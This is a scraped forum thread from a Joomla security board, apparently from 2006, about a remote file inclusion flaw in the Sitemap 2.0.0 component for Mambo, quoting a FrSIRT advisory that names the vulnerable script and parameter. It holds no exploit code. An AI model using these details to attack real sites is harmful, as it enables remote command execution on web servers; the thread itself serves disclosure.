Have a nice dayAuthor : Matdhule
Contact : [email protected]
Application : Sitemap 2.0.0 for Mambo 4.5.1 CMS
Version : Sitemap 2.0.0
Download : http://mamboxchange.com/frs/download.ph ... emap20.zip
Gustavo
Moderator: General Support Moderators
Post by gustavo » Wed Jul 12, 2006 3:10 pm
Have a nice dayAuthor : Matdhule
Contact : [email protected]
Application : Sitemap 2.0.0 for Mambo 4.5.1 CMS
Version : Sitemap 2.0.0
Download : http://mamboxchange.com/frs/download.ph ... emap20.zip
Post by Peter Koch » Wed Jul 12, 2006 3:55 pm
Post by gustavo » Fri Jul 14, 2006 12:56 pm
http://www.frsirt.com/english/advisories/2006/2803Advisory ID : FrSIRT/ADV-2006-2803
CVE ID : GENERIC-MAP-NOMATCH
Rated as : High Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-07-14
Technical Description
A vulnerability has been identified in SiteMap (component for Mambo), which may be exploited by attackers to execute arbitrary commands. This flaw is due to an input validation error in the "sitemap.xml.php" script that fails to validate the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious files and execute arbitrary commands with the privileges of the web server.
Affected Products
SiteMap (component for Mambo) version 2.0 and prior
Post by Jinx » Fri Jul 21, 2006 11:58 am
Return to “3rd Party/Non Joomla! Security Issues”
© 2005 - 2024 Open Source Matters, Inc. All Rights Reserved.